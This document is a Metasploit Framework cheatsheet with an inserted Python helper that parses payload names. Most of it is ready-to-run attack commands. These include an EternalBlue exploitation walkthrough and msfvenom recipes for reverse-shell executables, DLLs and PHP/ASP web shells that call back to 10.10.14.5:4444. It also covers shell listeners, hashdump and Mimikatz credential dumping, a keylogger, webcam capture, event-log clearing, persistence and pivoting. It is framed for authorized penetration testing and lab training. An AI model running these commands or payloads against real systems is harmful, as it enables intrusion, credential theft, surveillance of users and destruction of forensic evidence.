Metasploit Framework Cheatsheet

Default Ports: N/A (framework) — handlers commonly bind 4444/tcp

For authorized testing, CTFs, and lab use only. Always have explicit permission.


Starting Up

msfconsole                 # Launch the console
msfconsole -q              # Launch quietly (no banner)
msfconsole -r script.rc    # Run a resource script on start
msfdb init                 # Initialise the PostgreSQL database
msfdb status               # Check database status
service postgresql start   # Start DB backend (if not running)

Inside the console:

db_status                  # Confirm DB connection
version                    # Show framework version
help                       # List commands
banner                     # Print a random banner

Core Console Commands

Command             Description
search <term>       Search modules
use <module>        Select a module
info                Show details of the current module
show options        Show required/optional settings
show advanced       Show advanced options
show payloads       List compatible payloads
show targets        List target platforms
set <opt> <val>     Set an option
setg <opt> <val>    Set an option globally (all modules)
unset <opt>         Clear an option (unset all clears every option)
run / exploit       Execute the module
back                Leave the current module
info -d             Open the module's documentation in a browser

Searching Modules

search type:exploit platform:windows smb
search cve:2017-0144                  # EternalBlue
search name:eternalblue
search type:auxiliary scanner ssh
search rank:excellent type:exploit struts

Search filters: type:, platform:, cve:, name:, rank:, author:, app:, port:


Module Types

Type        Purpose
exploit     Code that triggers a vulnerability
auxiliary   Scanners, fuzzers, sniffers, DoS (no payload)
payload     Code run on the target after exploitation
encoder     Obfuscate/encode payloads
nop         NOP generators for padding
post        Post-exploitation modules

Working a Module

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST tun0
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
check                       # Test if target is vulnerable (if supported)
exploit                     # Or: run
exploit -j                  # Run as background job
exploit -z                  # Don't interact with session on success

Common options: RHOSTS (target), RPORT (target port), LHOST (your IP), LPORT (your listen port), PAYLOAD, TARGET.


Payloads — Staged vs Stageless

Notation                          Meaning
windows/meterpreter/reverse_tcp   Staged ('/' separators): a small stager pulls the rest
windows/meterpreter_reverse_tcp   Stageless ('_' separator): full payload in one shot
reverse_tcp                       Target connects back to you (works through NAT/firewalls)
bind_tcp                          You connect to a port the target opens
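To make the naming convention above concrete, here is an added Python example (not part of the original cheatsheet, not Metasploit's own code) that parses a payload path into platform, arch, stage, staged/stageless kind and connection direction; the ARCHES and STAGES sets are assumptions that cover only the common names.

```python
"""Parse Metasploit payload paths into their components (added example, not
Metasploit's own code). ARCHES and STAGES are assumptions covering common names only."""
import re
from dataclasses import dataclass
from typing import Optional

ARCHES = {"x64", "x86", "aarch64", "armle", "mipsle", "mipsbe"}
STAGES = {"meterpreter", "shell", "vncinject", "powershell", "dllinject", "upexec"}
# Last component: optional stage prefix joined by '_', then reverse_/bind_ and the transport.
LAST_RE = re.compile(r"^(?:(?P<stage>\w+?)_)?(?P<direction>reverse|bind)_(?P<transport>\w+)$")


@dataclass
class PayloadInfo:
    platform: str
    arch: Optional[str]
    stage: Optional[str]      # None for payloads with no named stage (e.g. cmd/unix/...)
    kind: str                 # "staged" ('/'-joined) or "stageless" ('_'-joined or single)
    direction: Optional[str]  # "reverse" (target calls back) or "bind" (target listens)
    transport: Optional[str]  # text after reverse_/bind_, e.g. "tcp", "https", "python"


def parse_payload(name: str) -> PayloadInfo:
    parts = name.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    last = parts[-1]
    arch = next((p for p in parts[1:-1] if p in ARCHES), None)
    platform = "/".join(p for p in parts[:-1] if p not in ARCHES and p not in STAGES)
    m = LAST_RE.match(last)
    if m is None:
        # No connection component (e.g. windows/x64/exec): a single, stageless payload.
        return PayloadInfo(platform, arch, None, "stageless", None, None)
    if m.group("stage"):
        # meterpreter_reverse_tcp: stage and transport joined by '_' -> stageless.
        return PayloadInfo(platform, arch, m.group("stage"), "stageless",
                           m.group("direction"), m.group("transport"))
    if parts[-2] in STAGES:
        # meterpreter/reverse_tcp: the stage is its own '/' component -> staged.
        return PayloadInfo(platform, arch, parts[-2], "staged",
                           m.group("direction"), m.group("transport"))
    # reverse_python and friends: a connection but no named stage -> stageless single.
    return PayloadInfo(platform, arch, None, "stageless",
                       m.group("direction"), m.group("transport"))


def handler_side(info: PayloadInfo) -> str:
    """Which side listens, as the reverse_/bind_ rows above describe."""
    return {"reverse": "operator listens (multi/handler); target connects out",
            "bind": "target listens; operator connects in"}.get(info.direction, "no network handler")
```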

msfvenom — Payload Generation

# List options
msfvenom -l payloads
msfvenom -l formats
msfvenom -l encoders

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o shell.dll

# ASP / ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp

# Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.5 LPORT=4444 -f raw

# Encoded, multiple iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe -o enc.exe

# Avoid bad characters
msfvenom -p ... -b '\x00\x0a\x0d' -f c

Common -f formats: exe, elf, dll, asp, aspx, war, raw, psh, python, c, hex.


Multi/Handler (Catching Shells)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j                 # Background listener

One-liner from bash:

msfconsole -q -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; exploit"

Sessions & Jobs

sessions                   # List active sessions
sessions -i 1              # Interact with session 1
sessions -i 1 -c "whoami"  # Run a command in a session
sessions -u 1              # Upgrade shell to Meterpreter
sessions -k 1              # Kill session 1
sessions -K                # Kill all sessions
background                 # Background current session (Ctrl+Z)

jobs                       # List background jobs
jobs -k <id>               # Kill a job

Meterpreter — System

sysinfo                    # OS / arch info
getuid                     # Current user
getpid                     # Current process ID
ps                         # Process list
getsystem                  # Attempt privilege escalation (Windows)
getprivs                   # List privileges
migrate <pid>              # Migrate into another process
execute -f cmd.exe -i      # Run a program interactively
shell                      # Drop to a system shell
idletime                   # User idle time
reboot / shutdown          # Power control

Meterpreter — Files & Pivoting

pwd / cd / ls / cat        # Filesystem navigation
download <remote> <local>  # Pull a file
upload <local> <remote>    # Push a file
search -f *.txt            # Search for files
edit <file>                # Edit a file

# Pivoting
run autoroute -s 10.10.20.0/24      # Add route through session
portfwd add -l 3389 -p 3389 -r <ip> # Local port forward
portfwd add -L 0.0.0.0 -l 8080 -r <ip> -p 80

Add a SOCKS proxy for tools like proxychains:

use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

Meterpreter — Credentials & Persistence

hashdump                   # Dump local SAM hashes
load kiwi                  # Load Mimikatz (Kiwi)
creds_all                  # Dump all creds (after load kiwi)
lsa_dump_sam               # Dump SAM via LSA (after load kiwi)
keyscan_start / keyscan_dump / keyscan_stop   # Keylogger
screenshot                 # Capture the desktop
webcam_snap                # Snap a webcam photo
clearev                    # Clear Windows event logs

# Persistence (use with caution / clean up afterwards)
run persistence -h                      # Meterpreter script: show its options
use exploit/windows/local/persistence   # Module form of the same capability

Post-Exploitation Modules

run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
run post/multi/recon/local_exploit_suggester   # Suggest priv-esc exploits
run post/windows/manage/migrate
search post/ platform:linux gather

local_exploit_suggester is the go-to after landing a low-priv session.


Database & Workspaces

workspace                  # List workspaces
workspace -a <name>        # Add and switch to a workspace
workspace <name>           # Switch
db_nmap -sV 10.10.10.0/24  # Run nmap, store results in DB
hosts                      # List discovered hosts
services                   # List discovered services
services -p 445            # Filter by port
vulns                      # List stored vulnerabilities
creds                      # List stored credentials
loot                       # List collected loot
db_export -f xml out.xml   # Export the DB

Resource Scripts & Automation

# Save commands to handler.rc, then:
msfconsole -r handler.rc

# Inside console, record/replay:
makerc /tmp/session.rc     # Save commands run this session
resource /tmp/session.rc   # Replay a resource script

Example handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j

Quick Workflow Reference

# 1. Recon into the DB
db_nmap -sCV -p- <target>

# 2. Find a module
search cve:2017-0144

# 3. Configure & verify
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target>
set LHOST tun0
check

# 4. Exploit
exploit

# 5. Post-ex
getuid
run post/multi/recon/local_exploit_suggester
hashdump